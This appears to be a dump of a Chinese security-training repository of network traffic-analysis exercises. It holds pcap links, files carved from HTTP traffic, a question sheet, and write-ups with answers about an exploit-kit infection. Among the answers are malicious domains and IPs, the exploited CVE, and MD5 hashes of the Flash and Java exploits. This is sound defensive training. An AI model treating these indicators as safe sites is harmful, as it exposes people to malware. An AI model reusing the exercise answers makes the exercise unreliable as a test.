https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/GLinkPing.aspx%3fIG=aee5908ea2d64991aa8b8996fd170a75&&ID=SERP,5091.1
--------------------------------------------------------------------------------
/流量分析/1/page/IMG-20130928-WA002-150x150.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/IMG-20130928-WA002-150x150.jpg
--------------------------------------------------------------------------------
/流量分析/1/page/P1260499-200x298.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/P1260499-200x298.jpg
--------------------------------------------------------------------------------
/流量分析/1/page/br_logo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/br_logo.gif
--------------------------------------------------------------------------------
/流量分析/1/page/donate_on.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/donate_on.gif
--------------------------------------------------------------------------------
/流量分析/1/page/facebook_on.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/facebook_on.gif
--------------------------------------------------------------------------------
/流量分析/1/page/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/favicon.ico
--------------------------------------------------------------------------------
/流量分析/1/page/functions.js:
--------------------------------------------------------------------------------
1 | (function($) {
2 |
3 | $(document).ready(function() {
4 | $(".donate img, .social img").hover(
5 | function() { this.src = this.src.replace("_on", "_off");
6 | },
7 | function() { this.src = this.src.replace("_off", "_on");
8 | });
9 | });
10 |
11 | })(jQuery);
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=jar&num=3703&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/index.php%3freq=jar&num=3703&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=jar&num=9229&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/index.php%3freq=jar&num=9229&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=mp3&num=16&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/index.php%3freq=mp3&num=16&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=mp3&num=803295&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/index.php%3freq=mp3&num=803295&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=mp3&num=95&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/index.php%3freq=mp3&num=95&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7CZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=swf&num=7533&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/index.php%3freq=swf&num=7533&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=swf&num=809&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/index.php%3freq=swf&num=809&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=xml&num=2527&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
1 | bcabcabcabcbbcabca
--------------------------------------------------------------------------------
/流量分析/1/page/index.php%3freq=xml&num=9345&PHPSSESID=njrMNruDMhvJFIPGKuXDSKVbM07PThnJko2ahe6JVg%7cZDJiZjZiZjI5Yzc5OTg3MzE1MzJkMmExN2M4NmJiOTM:
--------------------------------------------------------------------------------
1 | bcabcabcabcbbcabca
--------------------------------------------------------------------------------
/流量分析/1/page/lsp.aspx:
--------------------------------------------------------------------------------
1 | Event.ClientInstaee5908ea2d64991aa8b8996fd170a751416103911349{"T": "CI.BoxModel", "FID": "CI", "Name": "Perf", "Text": "S%3A0X0X660X278%3BBODY.%20%3A0X0X990X499%3BDIV.b_scopebar%3A0X80X437X30%3BH1.b_logo%3A17X19X73X29%3BDIV.b_searchboxForm%3A100X19X649X30%3BDIV%23id_h%3A859X80X126X30%3BDIV%23b_tween%3A100X135X890X30%3BSPAN.sb_count%3A120X135X105X30%3BOL%23b_results%3A100X165X560X1088%3BLI.b_algo%3A100X165X560X93%3BLI.b_algo%3A100X260X560X95%3BLI.b_algo%3A100X358X560X95%3BLI.b_algo%3A100X455X560X95%3BLI.b_algo%3A100X553X560X111%3BLI.b_algo%3A100X666X560X95%3BLI.b_algo%3A100X763X560X95%3BLI.b_algo%3A100X860X560X95%3BLI.b_algo%3A100X958X560X95%3BLI.b_algo%3A100X1055X560X95%3BLI.b_pag%3A100X1153X560X98%3BOL%23b_context%3A690X165X295X0%3BDIV.b_footer%3A0X1253X990X99%3BIMG%23id_p%3A0X0X0X0XEX-1X-1%3BIFRAME%3A0X0X0X0XWl%3B"}1416103911349
--------------------------------------------------------------------------------
/流量分析/1/page/newsletter_on.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/newsletter_on.gif
--------------------------------------------------------------------------------
/流量分析/1/page/notfound.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/notfound.gif
--------------------------------------------------------------------------------
/流量分析/1/page/page-list.css%3fver=4.2:
--------------------------------------------------------------------------------
1 | /*
2 | Page-list plugin
3 | http://wordpress.org/extend/plugins/page-list/
4 | */
5 |
6 | /* default styles for [pagelist], [subpages], [siblings] */
7 | .page-list .current_page_item > a {
8 | font-weight: bold; /* hilite active item */
9 | }
10 |
11 | /* default styles for [pagelist_ext] */
12 | .page-list-ext {
13 | clear: both;
14 | }
15 | /* clearfix-hack */
16 | .page-list-ext {
17 | *zoom: 1;
18 | }
19 | .page-list-ext:before, .page-list-ext:after {
20 | display: table;
21 | line-height: 0;
22 | content: "";
23 | }
24 | .page-list-ext:after {
25 | clear: both;
26 | }
27 | .page-list-ext .page-list-ext-item {
28 | clear: both;
29 | margin: 10px 0 30px 0;
30 | }
31 | .page-list-ext .page-list-ext-image {
32 | float: left;
33 | display: inline;
34 | margin: 5px 15px 15px 0;
35 | }
36 | .page-list-ext .page-list-ext-title {
37 | clear: none;
38 | }
39 |
--------------------------------------------------------------------------------
/流量分析/1/page/reset.css:
--------------------------------------------------------------------------------
1 | /* http://meyerweb.com/eric/tools/css/reset/
2 | v2.0 | 20110126
3 | License: none (public domain)
4 | */
5 |
6 | html, body, div, span, applet, object, iframe,
7 | h1, h2, h3, h4, h5, h6, p, blockquote, pre,
8 | a, abbr, acronym, address, big, cite, code,
9 | del, dfn, em, img, ins, kbd, q, s, samp,
10 | small, strike, strong, sub, sup, tt, var,
11 | b, u, i, center,
12 | dl, dt, dd, ol, ul, li,
13 | fieldset, form, label, legend,
14 | table, caption, tbody, tfoot, thead, tr, th, td,
15 | article, aside, canvas, details, embed,
16 | figure, figcaption, footer, header, hgroup,
17 | menu, nav, output, ruby, section, summary,
18 | time, mark, audio, video {
19 | margin: 0;
20 | padding: 0;
21 | border: 0;
22 | font-size: 100%;
23 | font: inherit;
24 | vertical-align: baseline;
25 | }
26 | /* HTML5 display-role reset for older browsers */
27 | article, aside, details, figcaption, figure,
28 | footer, header, hgroup, menu, nav, section {
29 | display: block;
30 | }
31 | body {
32 | line-height: 1;
33 | }
34 | ol, ul {
35 | list-style: none;
36 | }
37 | blockquote, q {
38 | quotes: none;
39 | }
40 | blockquote:before, blockquote:after,
41 | q:before, q:after {
42 | content: '';
43 | content: none;
44 | }
45 | table {
46 | border-collapse: collapse;
47 | border-spacing: 0;
48 | }
--------------------------------------------------------------------------------
/流量分析/1/page/squareorangedecor.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/squareorangedecor.gif
--------------------------------------------------------------------------------
/流量分析/1/page/styles.css%3fver=3.7.2:
--------------------------------------------------------------------------------
1 | div.wpcf7 {
2 | margin: 0;
3 | padding: 0;
4 | }
5 |
6 | div.wpcf7-response-output {
7 | margin: 2em 0.5em 1em;
8 | padding: 0.2em 1em;
9 | }
10 |
11 | div.wpcf7-mail-sent-ok {
12 | border: 2px solid #398f14;
13 | }
14 |
15 | div.wpcf7-mail-sent-ng {
16 | border: 2px solid #ff0000;
17 | }
18 |
19 | div.wpcf7-spam-blocked {
20 | border: 2px solid #ffa500;
21 | }
22 |
23 | div.wpcf7-validation-errors {
24 | border: 2px solid #f7e700;
25 | }
26 |
27 | span.wpcf7-form-control-wrap {
28 | position: relative;
29 | }
30 |
31 | span.wpcf7-not-valid-tip {
32 | color: #f00;
33 | font-size: 1em;
34 | display: block;
35 | }
36 |
37 | .use-floating-validation-tip span.wpcf7-not-valid-tip {
38 | position: absolute;
39 | top: 20%;
40 | left: 20%;
41 | z-index: 100;
42 | border: 1px solid #ff0000;
43 | background: #fff;
44 | padding: .2em .8em;
45 | }
46 |
47 | span.wpcf7-list-item {
48 | margin-left: 0.5em;
49 | }
50 |
51 | .wpcf7-display-none {
52 | display: none;
53 | }
54 |
55 | div.wpcf7 img.ajax-loader {
56 | border: none;
57 | vertical-align: middle;
58 | margin-left: 4px;
59 | }
60 |
61 | div.wpcf7 div.ajax-error {
62 | display: none;
63 | }
64 |
65 | div.wpcf7 .placeheld {
66 | color: #888;
67 | }
--------------------------------------------------------------------------------
/流量分析/1/page/twitter_on.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/twitter_on.gif
--------------------------------------------------------------------------------
/流量分析/1/page/youtubelogo_on.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/page/youtubelogo_on.gif
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-15-10-17-47.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-15-10-17-47.png
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-15-10-45-11.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-15-10-45-11.png
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-15-15-40-47.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-15-15-40-47.png
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-15-15-49-59.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-15-15-49-59.png
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-15-16-04-03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-15-16-04-03.png
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-15-16-16-31.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-15-16-16-31.png
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-15-16-22-16.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-15-16-22-16.png
--------------------------------------------------------------------------------
/流量分析/1/pic/2019-07-16-09-02-08.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/pic/2019-07-16-09-02-08.png
--------------------------------------------------------------------------------
/流量分析/1/writeup_level1.md:
--------------------------------------------------------------------------------
1 | ### LEVEL 1 QUESTIONS:
2 |
3 | >1.What is the IP address of the Windows VM that gets infected?(被感染的Windows VM的IP地址是什么?)
4 |
5 | >答案:172.16.165.165
6 |
7 | 将pcap包拖入wireshark中进行分析
8 |
9 | 此时,我们需要先对数据包进行筛选,使用命令`http.requset`
10 | 
11 |
12 |
13 | >2.What is the host name of the Windows VM that gets infected?(被感染的Windows VM的主机名是什么?)
14 |
15 | >答案:K34EN6W3N-PC
16 |
17 | 方法一:使用命令`nbns`进行筛选
18 | 
19 |
20 | **关于NetBIOS**
21 |
22 | **第一,NetBIOS基本概念**
23 |
24 | NetBIOS: NetBIOS Services Protocols, RFC-1001,1002,网络基本输入/输出系统协议。
25 |
26 | NetBIOS提供了三种软件服务:
27 | 1. 名称服务,包括名称登录与名称解析
28 | 2. 数据报文服务
29 | 3. 会话服务
30 |
31 | 每个计算机在网络中都有一个NetBIOS名称和一个IP地址。Windows系统对IPV6网络不再支持NetBIOS名称解析。
32 |
33 | **第二,什么是WINS服务**
34 |
35 | WINS (Windows Internet Name Service): WINS is Microsoft's implementation of NetBIOS Name Service (NBNS), a name server and service for NetBIOS computer names.
36 | 1. WINS服务器用于登记记录计算机NetBIOS名称和IP地址的对应关系,供局域网计算机查询。
37 | 2. WINS数据库是动态更新的。计算机每当初始化TCP/IP后都会将它的NetBIOS名和IP地址的对应关系映射到WINS服务器的数据库中。
38 |
39 | **第三,Windows系统的名字(NetBIOS名称、域名)解析机制**
40 | 1. Hosts文件(本地文件)
41 | 2. NetBIOS缓存(本地文件)
42 | 3. DNS服务器解析(DNS数据包)
43 | 4. WINS服务器解析(NBNS数据包)
44 | 5. NetBIOS广播查找(NBNS数据包)
45 |
46 | 方法二:使用`udp.port == 67`或`udp.port == 68`
47 |
48 | 
49 |
50 | https://zh.wikipedia.org/zh-hans/TCP/UDP%E7%AB%AF%E5%8F%A3%E5%88%97%E8%A1%A8
51 |
52 | https://zh.wikipedia.org/wiki/%E5%8A%A8%E6%80%81%E4%B8%BB%E6%9C%BA%E8%AE%BE%E7%BD%AE%E5%8D%8F%E8%AE%AE
53 |
54 | >3.What is the MAC address of the infected VM?(受感染虚拟机的MAC地址是多少?)
55 |
56 | >答案:f0:19:af:02:9b:f1
57 |
58 | >4.What is the IP address of the compromised web site?(受感染网站的IP地址是什么?)
59 |
60 | >答案:82.150.140.30
61 |
62 | >5.What is the domain name of the compromised web site?(受感染网站的域名是什么?)
63 |
64 | >答案:www.ciniholland.nl
65 |
66 | 
67 |
68 | >6.What is the IP address and domain name that delivered the exploit kit and malware?(提供漏洞攻击包和恶意软件的IP地址和域名是什么?)
69 |
70 | >答案:37.200.69.143/stand.trustandprobaterealty.com
71 |
72 | 
73 |
74 | https://zh.wikipedia.org/wiki/HTTP%E5%8F%83%E7%85%A7%E4%BD%8D%E5%9D%80
75 |
--------------------------------------------------------------------------------
/流量分析/1/writeup_level2.md:
--------------------------------------------------------------------------------
1 | ### LEVEL 2 QUESTIONS:
2 |
3 | >1.What is the redirect URL that points to the exploit kit (EK) landing page?(指向漏洞利用工具包(EK)登录页面的重定向URL是什么?)
4 |
5 | >答案:http://24corp-shop.com/
6 |
7 | 
8 |
9 | 在地址`http://24corp-shop.com/`中,实际上嵌套了一个iframe,地址指向漏洞利用工具包(EK)登录页面
10 |
11 | 或者,可以使用`File --> Export Object --> HTTP`功能
12 |
13 | 
14 |
15 | 打开文件名为`%0f(1)`的文件 -- 为什么是`%0f(1)`?
16 |
17 | https://zh.wikipedia.org/zh-hans/%E7%99%BE%E5%88%86%E5%8F%B7%E7%BC%96%E7%A0%81
18 |
19 | >2.Besided the landing page (which contains the CVE-2013-2551 IE exploit), what other exploit(s) sent by the EK?(在着陆页(包含CVE-2013-2551 IE漏洞利用)旁边,EK发送了哪些其他漏洞利用?)
20 |
21 | >答案:2个,一个flash漏洞利用脚本、一个java漏洞脚本
22 |
23 | >3.How many times was the payload(CVE-2013-2551) delivered?(有效载荷交付了多少次?)
24 |
25 | >答案:3次(payload被加密了,标记为x-msdownload)
26 |
--------------------------------------------------------------------------------
/流量分析/1/writeup_level3.md:
--------------------------------------------------------------------------------
1 | ### LEVEL 3 QUESTIONS:
2 |
3 | >1.What file or page from the compromised website has the malicious script with the URL for the redirect?(受感染网站的哪个文件或页面包含带有重定向URL的恶意脚本?)
4 |
5 | >答案:http://24corp-shop.com/
6 |
7 | 
8 |
9 |
10 | >2.Extract the exploit file(s). What is(are) the md5 file hash(es)?(提取漏洞利用文件。文件的MD5哈希值是什么?)
11 |
12 | >答案:Flash exploit: 7b3baa7d6bb3720f369219789e38d6ab
13 | >Java exploit: 1e34fdebbf655cebea78b45e43520ddf
14 |
--------------------------------------------------------------------------------
/流量分析/1/题目内容/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/题目内容/.DS_Store
--------------------------------------------------------------------------------
/流量分析/1/题目内容/bak/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/题目内容/bak/.DS_Store
--------------------------------------------------------------------------------
/流量分析/1/题目内容/bak/traffic-analysis-exercise.pcap.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/题目内容/bak/traffic-analysis-exercise.pcap.zip
--------------------------------------------------------------------------------
/流量分析/1/题目内容/traffic-analysis-exercise.pcap:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/1/题目内容/traffic-analysis-exercise.pcap
--------------------------------------------------------------------------------
/流量分析/1/题目内容/题目说明.md:
--------------------------------------------------------------------------------
1 | ## DESCRIPTION
2 | ## 题目描述
3 |
4 | 虚拟机在浏览某个网站时,受到了恶意攻击,我们已经抓取了完整的流量,你能根据以下问题进行分析吗?
5 |
6 | ## QUESTIONS
7 | ## 问题
8 | ---
9 | ### LEVEL 1 QUESTIONS:
10 | 1) What is the IP address of the Windows VM that gets infected?
11 | 2) What is the host name of the Windows VM that gets infected?
12 | 3) What is the MAC address of the infected VM?
13 | 4) What is the IP address of the compromised web site?
14 | 5) What is the domain name of the compromised web site?
15 | 6) What is the IP address and domain name that delivered the exploit kit and malware?
16 | 7) What is the domain name that delivered the exploit kit and malware?
17 |
18 | ### 第1级问题:
19 | 1)被感染的Windows VM的IP地址是什么?
20 | 2)被感染的Windows VM的主机名是什么?
21 | 3)受感染虚拟机的MAC地址是多少?
22 | 4)受感染网站的IP地址是什么?
23 | 5)受感染网站的域名是什么?
24 | 6)提供漏洞攻击包和恶意软件的IP地址和域名是什么?
25 | 7)提供漏洞攻击包和恶意软件的域名是什么?
26 |
27 | ### LEVEL 2 QUESTIONS:
28 | 1) What is the redirect URL that points to the exploit kit (EK) landing page?
29 | 2) Besided the landing page (which contains the CVE-2013-2551 IE exploit), what other exploit(s) sent by the EK?
30 | 3) How many times was the payload delivered?
31 |
32 | ### 第2级问题:
33 | 1)指向漏洞利用工具包(EK)登录页面的重定向URL是什么?
34 | 2)在着陆页(包含CVE-2013-2551 IE漏洞利用)旁边,EK发送了哪些其他漏洞利用?
35 | 3)有效载荷交付了多少次?
36 |
37 | ### LEVEL 3 QUESTIONS:
38 | 1) What file or page from the compromised website has the malicious script with the URL for the redirect?
39 | 2) Extract the exploit file(s). What is(are) the md5 file hash(es)?
40 |
41 | ### 第3级问题:
42 | 1)受感染网站的哪个文件或页面包含带有重定向URL的恶意脚本?
43 | 2)提取漏洞利用文件。文件的MD5哈希值是什么?
44 |
45 |
46 | _压缩包密码:infected_
--------------------------------------------------------------------------------
/流量分析/2/2.traffic-analysis-exercise-answers.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/2/2.traffic-analysis-exercise-answers.pdf
--------------------------------------------------------------------------------
/流量分析/2/page/%3fCC=1&party=8:
--------------------------------------------------------------------------------
1 | Object moved
2 | Object moved to here.
3 |
4 |
--------------------------------------------------------------------------------
/流量分析/2/page/%3fpartnerid=32&partneruserid=2670201883056171348:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/2/page/%3fpartnerid=32&partneruserid=2670201883056171348
--------------------------------------------------------------------------------
/流量分析/2/page/%3fparty=8:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/2/page/%3fparty=8
--------------------------------------------------------------------------------
/流量分析/2/page/%3fsite=6612&size=1&iframe=0&url=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad2.html&src=http%3A%2F%2Fhijinksensue.com%2F&store=0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/2/page/%3fsite=6612&size=1&iframe=0&url=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad2.html&src=http%3A%2F%2Fhijinksensue.com%2F&store=0
--------------------------------------------------------------------------------
/流量分析/2/page/%3fsite=6612&size=3&iframe=0&url=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad3.html&src=http%3A%2F%2Fhijinksensue.com%2F&store=0:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/2/page/%3fsite=6612&size=3&iframe=0&url=http%3A%2F%2Fhijinksensue.com%2Fassets%2Fverts%2Fhiveworks%2Fad3.html&src=http%3A%2F%2Fhijinksensue.com%2F&store=0
--------------------------------------------------------------------------------
/流量分析/2/page/%3fxid=HhLG4HXq9vhIeSEKMF3ZwA9p:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/NB-STAR/Security-Operation/31704403dbd3bd86ece5bc2d8b6b7fe939bb2e4a/流量分析/2/page/%3fxid=HhLG4HXq9vhIeSEKMF3ZwA9p
--------------------------------------------------------------------------------
/流量分析/2/page/&rp_s=c&kw=Hijinksensue.com&tg_i.Site=Hijinksensue(1).com&p_pos=btf&p_screen_res=1440x900:
--------------------------------------------------------------------------------
1 | rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
2 | window.rubicon_ad = "3419627" + "." + "js"; window.rubicon_creative = "3521655" + "." + "js"; rubicon_tag_code = "
13 |
14 |
15 | 
19 |
20 |